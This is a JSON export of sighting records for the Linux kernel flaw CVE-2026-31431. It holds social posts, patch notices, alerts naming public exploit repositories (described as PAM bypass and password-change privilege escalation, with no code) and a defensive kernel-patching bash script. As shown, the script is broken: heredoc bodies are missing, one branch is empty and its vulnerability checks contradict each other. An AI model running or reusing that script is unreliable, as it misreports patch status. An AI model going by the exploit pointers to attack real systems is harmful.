"Telegram/3mcAKt-TCdIGsV7AJ163_iqV6zQW8_VtQJEsWZ7ibFZpkk0", "content": "", "creation_timestamp": "2026-05-14T03:00:06.000000Z"}, {"uuid": "6e3187af-03fa-4d1d-ae7f-326c5d8ee84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlubzmjy2i2u", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 147 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 72 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 39 interactions\nCVE-2026-42945: 17 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-15T02:30:32.244467Z"}, {"uuid": "48bafc29-259d-4cb8-ab6f-7f69e7068be7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/pxejltfM6t0bOCIPs7C1JhjfACvEO7Gy-x7DlZhJbRtGeV0", "content": "", "creation_timestamp": "2026-05-14T21:00:04.000000Z"}, {"uuid": "b265da7a-4d46-4f91-a597-cb4d5f54e368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/echobit.de/post/3mlthd2agk222", "content": "Linux is most secure OS. Yes. It's perfectly safe\u2026\n\n- Dirty Cow (CVE-2016-5195)\n- Dirty Pipe (CVE-2022-0847)\n- io_uring UAF (CVE-2022-2602)\n- Copy Fail (CVE-2026-31431)\n- Dirty Frag (CVE-2026-43284\n- Fragnesia (CVE-2026-46300)\n\n\u2026 so you have that many methods to recover your root password. \ud83d\ude02", "creation_timestamp": "2026-05-14T18:34:51.684708Z"}, {"uuid": "12f4d02a-a5fc-4a7d-b70d-062676c4be0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vino-tinto.bsky.social/post/3mlvqpa6o422z", "content": " #CopyFail ( #CVE-2026-31431 ) Patches Released\nUpdate: Patched kernels are now in production\n \n2026-05-01 21:07 UTC \u2014 The patched kernels are now rolling out to production repositories/mirrors. You no longer need to enable the testing repo to get them.", "creation_timestamp": "2026-05-15T16:25:51.592191Z"}, {"uuid": "3179aaa5-5315-42c4-911a-f95386064d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vino-tinto.bsky.social/post/3mlwg7l5fjk2x", "content": "Just run:\n \n  sudo dnf clean metadata && sudo dnf upgrade\n  sudo reboot\n \n\u203b almalinux.org/blog/2026-05...\n\u56f0\u3063\u305f\u3082\u3093\u3060\u3002(--;;\n #CopyFail #CVE-2026-31431", "creation_timestamp": "2026-05-15T22:52:14.508798Z"}, {"uuid": "031eb8a5-4c2d-4901-a430-b9e6085e10ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/84386", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-CopyFail-Linux-PrivEsc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a John-Popovici\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-15 23:42:49\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA demo and explanation of CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-16T00:00:04.000000Z"}, {"uuid": "8480bd10-d9ce-4fc9-8f32-88e62b79493d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/siyeonized.bsky.social/post/3mlyui2k5ek2z", "content": "voy a ver si ma\u00f1ana me pongo a intentar explotar la CVE-2026-46333 o  CVE-2026-31431 que parec\u00eda sencilla para m\u00ed TFM", "creation_timestamp": "2026-05-16T22:11:23.186892Z"}, {"uuid": "5a2b49fe-a9a8-4773-acd7-a28d8c450cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84403", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-rs\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Liverwortenuresis371\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Rust\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-16 03:59:10\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit and detect CVE-2026-31431 vulnerabilities using a static binary that monitors system integrity and bypasses PAM authentication.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-16T04:00:05.000000Z"}, {"uuid": "258a78ee-f13a-49ac-9641-34eb0b4306b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84516", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-CopyFail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Koke-Seas\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 00:31:01\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nEntender el CVE-2026-31431 y realizar las siguientes tareas\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T01:00:04.000000Z"}, {"uuid": "aedfab38-e2ba-4f65-8fba-746992f72739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/7cUPikWYVy9ZWytWyAxwh66xAlCEPyyOlWhVl_FYZCzkhJ4", "content": "", "creation_timestamp": "2026-05-16T03:00:05.000000Z"}, {"uuid": "b5c35316-63a1-4526-80a2-26ae3258eb19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/qFnncewX_FdOxDivGoEqJX19AvA6N2dSwzORt9UZIQWFUQU", "content": "", "creation_timestamp": "2026-05-17T02:07:47.000000Z"}, {"uuid": "41bea207-03da-431b-a6ed-ef39b284c7d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/M2s3PphtTCD9brru-X6QMyPesFMqQlhfbVnnLWpusEfiV5g", "content": "", "creation_timestamp": "2026-05-16T21:00:04.000000Z"}, {"uuid": "3737c1d3-1fbd-428c-87df-6820889b92b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/BIFzugM5LeF0e6B_pMrPZhP4YBZGHVlsiAyHoc_EkWiJ58i1", "content": "", "creation_timestamp": "2026-05-17T20:49:35.000000Z"}, {"uuid": "027d008d-5b12-49d0-9247-7fdc1ec62235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/84533", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a public-passwd\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Aurillium\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 06:55:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nUse CVE-2026-46333 and CVE-2026-31431 to change any user's password.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T07:00:04.000000Z"}, {"uuid": "28eabb96-a880-452b-a428-3d17c3440386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84541", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Linux-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Dullpurple-sloop726\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Rust\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-17 09:59:30\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit CVE-2026-31431 on Linux using a Rust implementation to achieve local privilege escalation via an arbitrary page cache write primitive.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-17T10:00:05.000000Z"}, {"uuid": "22fb173b-9813-4b19-a769-2f34b8e76710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/eEkK6PVbdDfglsyujSuxBWIZjJpDuh84Njq8yhH-Zu1Cfr8", "content": "", "creation_timestamp": "2026-05-18T03:00:06.000000Z"}, {"uuid": "5a9de463-16a4-466b-8fab-7f709b8edffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mm3tgsl54a2v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-46300: 56 interactions\nCVE-2026-42897: 54 interactions\nCVE-2026-31431: 43 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2025-55182: 18 interactions\nCVE-2026-31635: 5 interactions\nCVE-2025-53892: 4 interactions\n", "creation_timestamp": "2026-05-18T02:30:46.551160Z"}, {"uuid": "04472365-569b-47e6-b850-5836e25a2b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/artia13city.bsky.social/post/3mm4mm2va2z2a", "content": "\ud83d\udea8 Cyberattaques \u00e0 la une ! La France engage 200M\u20ac pour contrer la faille \"Copy Fail\" dans le noyau Linux (CVE-2026-31431) qui menace les syst\u00e8mes depuis 2017. Pendant ce temps, des packages npm de SAP ont \u00e9t\u00e9 compromis par le groupe TeamPCP, mettant en p\u00e9ril les secrets des d\u00e9veloppeurs. Restez vigi", "creation_timestamp": "2026-05-18T10:01:06.674939Z"}, {"uuid": "8a418652-340e-437c-8a9a-d0cef005e63b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/shishir-salam/d73a9a5137ac7e958c727edcab5bc3d2", "content": "#!/bin/bash\n################################################################################\n# Linux Kernel Security Patching Script\n#\n# Purpose: Apply kernel security updates to patch:\n#   - Copy Fail vulnerability (CVE-2026-31431 / algif_aead)\n#   - Dirty Frag vulnerability (net packet fragmentation)\n# Usage: sudo ./apply-kernel-patch.sh\n# WARNING: This will update the kernel and require a reboot\n################################################################################\n\nset -euo pipefail\n\n# Colors\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nNC='\\033[0m'\n\nSCRIPT_VERSION=\"2.4\"\nCVE_ID=\"CVE-2026-31431\"\nPATCH_DATE=$(date -u +\"%Y-%m-%dT%H:%M:%SZ\")\nLOG_FILE=\"/var/log/kernel-security-patching.log\"\nS3_BUCKET=\"${1:-eps-server-prep}\"\nRESULTS_PREFIX=\"results\"\nAUTO_REBOOT=\"${2:-yes}\"\nMINIMUM_FIXED_KERNEL=\"6.1.170-210.320.amzn2023\"\n\necho \"==========================================\"\necho \"Linux Kernel Security Patching\"\necho \"Targets: Copy Fail + Dirty Frag\"\necho \"Version: $SCRIPT_VERSION\"\necho \"Date: $PATCH_DATE\"\necho \"==========================================\"\necho \"\"\n\n# Check root\nif [[ $EUID -ne 0 ]]; then\n   echo -e \"${RED}ERROR: This script must be run as root${NC}\"\n   exit 1\nfi\n\n# Log function\nlog() {\n    echo \"[$(date -u +\"%Y-%m-%d %H:%M:%S UTC\")] $1\" | tee -a \"$LOG_FILE\"\n}\n\nlog \"Starting kernel patching for $CVE_ID\"\n\n# Get system information\nHOSTNAME=$(hostname)\nDISTRO=$(grep ^ID= /etc/os-release | cut -d= -f2 | tr -d '\"')\nCURRENT_KERNEL=$(uname -r)\n\necho \"System Information:\"\necho \"  Hostname: $HOSTNAME\"\necho \"  Distribution: $DISTRO\"\necho \"  Current Kernel: $CURRENT_KERNEL\"\necho \"\"\n\n# Step 1: Pre-patch backup\necho \"[1/5] Creating pre-patch snapshot information...\"\nlog \"Creating pre-patch snapshot\"\n\ncat > \"/var/log/cve-2026-31431-pre-patch-snapshot.txt\" <> \"/var/log/cve-2026-31431-pre-patch-snapshot.txt\"\nelif [ \"$DISTRO\" == \"ubuntu\" ] || [ \"$DISTRO\" == \"debian\" ]; then\n    dpkg -l | grep linux-image >> \"/var/log/cve-2026-31431-pre-patch-snapshot.txt\"\nfi\n\nlog \"Pre-patch snapshot saved\"\necho -e \"${GREEN}  Snapshot created${NC}\"\n\n# Step 2: Update package repositories\necho \"\"\necho \"[2/5] Updating package repositories...\"\nlog \"Updating package repositories\"\n\nif [ \"$DISTRO\" == \"amzn\" ] || [ \"$DISTRO\" == \"rhel\" ]; then\n    if yum check-update -q 2>/dev/null; then\n        echo \"  Repository check completed\"\n    fi\nelif [ \"$DISTRO\" == \"ubuntu\" ] || [ \"$DISTRO\" == \"debian\" ]; then\n    apt-get update -qq\nfi\n\nlog \"Package repositories updated\"\necho -e \"${GREEN}  Repositories updated${NC}\"\n\n# Helper function to compare kernel versions\ncompare_kernel_versions() {\n    local current=\"$1\"\n    local minimum=\"$2\"\n\n    # Extract version components (6.1.170-210.320.amzn2023.x86_64 -> 6 1 170 210 320)\n    local curr_major=$(echo \"$current\" | cut -d. -f1)\n    local curr_minor=$(echo \"$current\" | cut -d. -f2)\n    local curr_patch=$(echo \"$current\" | cut -d. -f3 | cut -d- -f1)\n    local curr_build1=$(echo \"$current\" | cut -d- -f2 | cut -d. -f1)\n    local curr_build2=$(echo \"$current\" | cut -d- -f2 | cut -d. -f2)\n\n    local min_major=$(echo \"$minimum\" | cut -d. -f1)\n    local min_minor=$(echo \"$minimum\" | cut -d. -f2)\n    local min_patch=$(echo \"$minimum\" | cut -d. -f3 | cut -d- -f1)\n    local min_build1=$(echo \"$minimum\" | cut -d- -f2 | cut -d. -f1)\n    local min_build2=$(echo \"$minimum\" | cut -d- -f2 | cut -d. -f2)\n\n    # Compare each component\n    if [ \"$curr_major\" -gt \"$min_major\" ]; then return 0; fi\n    if [ \"$curr_major\" -lt \"$min_major\" ]; then return 1; fi\n\n    if [ \"$curr_minor\" -gt \"$min_minor\" ]; then return 0; fi\n    if [ \"$curr_minor\" -lt \"$min_minor\" ]; then return 1; fi\n\n    if [ \"$curr_patch\" -gt \"$min_patch\" ]; then return 0; fi\n    if [ \"$curr_patch\" -lt \"$min_patch\" ]; then return 1; fi\n\n    if [ \"$curr_build1\" -gt \"$min_build1\" ]; then return 0; fi\n    if [ \"$curr_build1\" -lt \"$min_build1\" ]; then return 1; fi\n\n    if [ \"$curr_build2\" -ge \"$min_build2\" ]; then return 0; fi\n    return 1\n}\n\n# Step 3: Check for kernel updates\necho \"\"\necho \"[3/5] Checking for kernel updates...\"\nlog \"Checking for kernel updates\"\necho \"  Minimum required kernel: $MINIMUM_FIXED_KERNEL\"\necho \"  Current kernel: $CURRENT_KERNEL\"\n\nUPDATES_AVAILABLE=false\nVULN_FIX_STATUS=\"UNKNOWN\"\n\n# Check if current kernel meets minimum version\nif compare_kernel_versions \"$CURRENT_KERNEL\" \"$MINIMUM_FIXED_KERNEL\"; then\n    echo -e \"  ${GREEN}\u2713 Current kernel meets or exceeds minimum fixed version${NC}\"\n    log \"Current kernel $CURRENT_KERNEL meets minimum $MINIMUM_FIXED_KERNEL\"\n\n    # Verify vulnerabilities are actually fixed\n    echo \"\"\n    echo \"  Verifying vulnerability status...\"\n\n    # Check Copy Fail (algif_aead)\n    COPY_FAIL_STATUS=\"UNKNOWN\"\n    if modinfo algif_aead &>/dev/null; then\n        if lsmod | grep -q algif_aead; then\n            echo -e \"  ${YELLOW}\u26a0 Copy Fail: algif_aead module loaded (check if mitigation active)${NC}\"\n            COPY_FAIL_STATUS=\"MITIGATED\"\n        else\n            echo -e \"  ${GREEN}\u2713 Copy Fail: algif_aead present but not loaded (MITIGATED)${NC}\"\n            COPY_FAIL_STATUS=\"MITIGATED\"\n        fi\n    else\n        echo -e \"  ${GREEN}\u2713 Copy Fail: algif_aead module not in kernel (FIXED)${NC}\"\n        COPY_FAIL_STATUS=\"FIXED\"\n    fi\n\n    # Dirty Frag is fixed in kernel 6.1.170+\n    echo -e \"  ${GREEN}\u2713 Dirty Frag: Fixed in kernel $CURRENT_KERNEL${NC}\"\n    DIRTY_FRAG_STATUS=\"FIXED\"\n\n    echo \"\"\n    echo -e \"${GREEN}System is on fixed kernel version. No update needed.${NC}\"\n    echo \"\"\n    echo \"Current kernel: $CURRENT_KERNEL\"\n    echo \"Copy Fail Status: $COPY_FAIL_STATUS\"\n    echo \"Dirty Frag Status: $DIRTY_FRAG_STATUS\"\n    echo \"\"\n    log \"No updates needed - kernel $CURRENT_KERNEL is fixed\"\n\n    # Upload verification results\n    cat > \"/var/log/cve-2026-31431-patch-status.json\" </dev/null; then\n        echo -e \"${GREEN}  Results uploaded to s3://$S3_BUCKET/$RESULTS_PREFIX/$RESULT_FILE${NC}\"\n    fi\n\n    exit 0\nfi\n\necho -e \"  ${YELLOW}Current kernel is below minimum fixed version${NC}\"\nlog \"Current kernel $CURRENT_KERNEL is below minimum $MINIMUM_FIXED_KERNEL\"\n\nif [ \"$DISTRO\" == \"amzn\" ] || [ \"$DISTRO\" == \"rhel\" ]; then\n    # Check if the fixed kernel is already installed (e.g., after rollback)\n    if rpm -qa kernel | grep -q \"$MINIMUM_FIXED_KERNEL\"; then\n        echo \"\"\n        echo -e \"  ${GREEN}Fixed kernel $MINIMUM_FIXED_KERNEL is already installed${NC}\"\n        echo \"  Setting GRUB default to use the fixed kernel...\"\n        log \"Fixed kernel already installed, updating GRUB default\"\n\n        # Set GRUB default to the fixed kernel\n        if grubby --set-default /boot/vmlinuz-$MINIMUM_FIXED_KERNEL 2>&1 | tee -a \"$LOG_FILE\"; then\n            echo -e \"  ${GREEN}GRUB default updated to fixed kernel${NC}\"\n            log \"SUCCESS: GRUB default set to $MINIMUM_FIXED_KERNEL\"\n\n            NEW_KERNEL_INSTALLED=\"kernel-$MINIMUM_FIXED_KERNEL\"\n            UPDATES_AVAILABLE=false\n            VULN_FIX_STATUS=\"TO_BE_VERIFIED_POST_REBOOT\"\n\n            # Skip to save patch status section\n        else\n            echo -e \"  ${RED}Failed to update GRUB default${NC}\"\n            log \"ERROR: Failed to set GRUB default\"\n            exit 1\n        fi\n    else\n        echo \"\"\n        echo \"  Attempting kernel update using AWS recommended method...\"\n        echo \"  Using: dnf update kernel --releasever 2023.11.20260509\"\n        log \"Forcing kernel update with releasever 2023.11.20260509\"\n\n        UPDATES_AVAILABLE=true\n        VULN_FIX_STATUS=\"TO_BE_VERIFIED_POST_REBOOT\"\n    fi\nelif [ \"$DISTRO\" == \"ubuntu\" ] || [ \"$DISTRO\" == \"debian\" ]; then\n    if apt-cache policy linux-image-generic | grep -q \"Candidate:\"; then\n        UPDATES_AVAILABLE=true\n        AVAILABLE_KERNEL=$(apt-cache policy linux-image-generic | grep Candidate | awk '{print $2}')\n        echo \"  Kernel update available: $AVAILABLE_KERNEL\"\n        log \"Kernel update available: $AVAILABLE_KERNEL\"\n\n        echo \"\"\n        echo \"  Proceeding with kernel update to latest version\"\n        log \"Proceeding with kernel update\"\n        VULN_FIX_STATUS=\"TO_BE_VERIFIED_POST_REBOOT\"\n    else\n        echo \"  No kernel updates available - already on latest kernel\"\n        log \"No updates available - system on latest kernel\"\n        echo \"\"\n        echo -e \"${YELLOW}System is already on the latest available kernel.${NC}\"\n        echo \"Current kernel: $CURRENT_KERNEL\"\n        echo \"\"\n        log \"No updates available - exiting\"\n        exit 0\n    fi\nfi\n\n# Step 4: Apply kernel updates (only if not already installed)\nif [ \"$UPDATES_AVAILABLE\" = true ]; then\n    echo \"\"\n    echo \"[4/5] Applying kernel updates...\"\n    log \"Applying kernel updates\"\n\n    echo -e \"${YELLOW}Proceeding with kernel update (automated deployment)${NC}\"\n    log \"Automated kernel update initiated\"\n\n    if [ \"$DISTRO\" == \"amzn\" ] || [ \"$DISTRO\" == \"rhel\" ]; then\n        # AWS recommended command for Amazon Linux 2023\n        log \"Running: dnf update kernel --releasever 2023.11.20260509 -y\"\n        echo \"  Using AWS recommended update command with releasever 2023.11.20260509\"\n        if dnf update kernel --releasever 2023.11.20260509 -y 2>&1 | tee -a \"$LOG_FILE\"; then\n            log \"SUCCESS: Kernel updated successfully\"\n            echo -e \"${GREEN}  Kernel updated successfully${NC}\"\n        else\n            log \"ERROR: Kernel update failed\"\n            echo -e \"${RED}  Kernel update failed${NC}\"\n            exit 1\n        fi\n    fi\nelse\n    echo \"\"\n    echo \"[4/5] Kernel update skipped (already installed, GRUB updated)\"\n    log \"Skipped dnf update - kernel already installed, GRUB updated\"\nfi\n\nif [ \"$UPDATES_AVAILABLE\" = true ]; then\nelif [ \"$DISTRO\" == \"ubuntu\" ] || [ \"$DISTRO\" == \"debian\" ]; then\n    log \"Running: apt-get upgrade linux-image-generic -y\"\n    if apt-get upgrade linux-image-generic -y 2>&1 | tee -a \"$LOG_FILE\"; then\n        log \"SUCCESS: Kernel updated successfully\"\n        echo -e \"${GREEN}  Kernel updated successfully${NC}\"\n    else\n        log \"ERROR: Kernel update failed\"\n        echo -e \"${RED}  Kernel update failed${NC}\"\n        exit 1\n    fi\nfi\n\n# Step 5: Post-patch verification\necho \"\"\necho \"[5/5] Post-patch verification...\"\nlog \"Performing post-patch verification\"\n\nNEW_KERNEL_INSTALLED=$(rpm -qa kernel --last 2>/dev/null | head -1 | awk '{print $1}' || dpkg -l | grep linux-image | tail -1 | awk '{print $3}')\necho \"  New kernel installed: $NEW_KERNEL_INSTALLED\"\nlog \"New kernel installed: $NEW_KERNEL_INSTALLED\"\n\n# Save patch status\ncat > \"/var/log/cve-2026-31431-patch-status.json\" </dev/null; then\n    echo -e \"${GREEN}  Results uploaded to s3://$S3_BUCKET/$RESULTS_PREFIX/$RESULT_FILE${NC}\"\n    log \"Results uploaded to S3 successfully\"\nelse\n    echo -e \"${YELLOW}  Warning: Could not upload results to S3${NC}\"\n    log \"WARNING: S3 upload failed\"\nfi\n\n# Final summary\necho \"\"\necho \"==========================================\"\necho \"PATCHING SUMMARY\"\necho \"==========================================\"\necho -e \"${GREEN}Status: PATCH APPLIED${NC}\"\necho \"\"\necho \"Previous kernel: $CURRENT_KERNEL\"\necho \"New kernel: $NEW_KERNEL_INSTALLED\"\necho \"\"\necho \"Vulnerability Fix Status: Will be verified after reboot\"\necho \"\"\n\n# Schedule post-reboot verification\ncat > \"/var/lib/cloud/scripts/per-boot/verify-kernel-patch.sh\" <<'VERIFY_EOF'\n#!/bin/bash\n# Post-reboot verification script\nHOSTNAME=$(hostname)\nCURRENT_KERNEL=$(uname -r)\nS3_BUCKET=\"eps-server-prep\"\nRESULTS_PREFIX=\"results\"\nMINIMUM_FIXED_KERNEL=\"6.1.170-210.320.amzn2023\"\n\n# Helper function to compare kernel versions\ncompare_kernel_versions() {\n    local current=\"$1\"\n    local minimum=\"$2\"\n\n    local curr_major=$(echo \"$current\" | cut -d. -f1)\n    local curr_minor=$(echo \"$current\" | cut -d. -f2)\n    local curr_patch=$(echo \"$current\" | cut -d. -f3 | cut -d- -f1)\n    local curr_build1=$(echo \"$current\" | cut -d- -f2 | cut -d. -f1)\n    local curr_build2=$(echo \"$current\" | cut -d- -f2 | cut -d. -f2)\n\n    local min_major=$(echo \"$minimum\" | cut -d. -f1)\n    local min_minor=$(echo \"$minimum\" | cut -d. -f2)\n    local min_patch=$(echo \"$minimum\" | cut -d. -f3 | cut -d- -f1)\n    local min_build1=$(echo \"$minimum\" | cut -d- -f2 | cut -d. -f1)\n    local min_build2=$(echo \"$minimum\" | cut -d- -f2 | cut -d. -f2)\n\n    if [ \"$curr_major\" -gt \"$min_major\" ]; then return 0; fi\n    if [ \"$curr_major\" -lt \"$min_major\" ]; then return 1; fi\n    if [ \"$curr_minor\" -gt \"$min_minor\" ]; then return 0; fi\n    if [ \"$curr_minor\" -lt \"$min_minor\" ]; then return 1; fi\n    if [ \"$curr_patch\" -gt \"$min_patch\" ]; then return 0; fi\n    if [ \"$curr_patch\" -lt \"$min_patch\" ]; then return 1; fi\n    if [ \"$curr_build1\" -gt \"$min_build1\" ]; then return 0; fi\n    if [ \"$curr_build1\" -lt \"$min_build1\" ]; then return 1; fi\n    if [ \"$curr_build2\" -ge \"$min_build2\" ]; then return 0; fi\n    return 1\n}\n\n# Check if kernel meets minimum version\nKERNEL_VERSION_STATUS=\"UNKNOWN\"\nif compare_kernel_versions \"$CURRENT_KERNEL\" \"$MINIMUM_FIXED_KERNEL\"; then\n    KERNEL_VERSION_STATUS=\"MEETS_MINIMUM\"\nelse\n    KERNEL_VERSION_STATUS=\"BELOW_MINIMUM\"\nfi\n\n# Check Copy Fail vulnerability\nCOPY_FAIL_STATUS=\"UNKNOWN\"\nif modinfo algif_aead &>/dev/null; then\n    if lsmod | grep -q algif_aead; then\n        COPY_FAIL_STATUS=\"STILL_VULNERABLE\"\n    else\n        COPY_FAIL_STATUS=\"MITIGATED\"\n    fi\nelse\n    COPY_FAIL_STATUS=\"FIXED\"\nfi\n\n# Check Dirty Frag - fixed in kernel 6.1.170+\nDIRTY_FRAG_STATUS=\"UNKNOWN\"\nif [ \"$KERNEL_VERSION_STATUS\" == \"MEETS_MINIMUM\" ]; then\n    DIRTY_FRAG_STATUS=\"FIXED\"\nelse\n    DIRTY_FRAG_STATUS=\"NOT_FIXED\"\nfi\n\n# 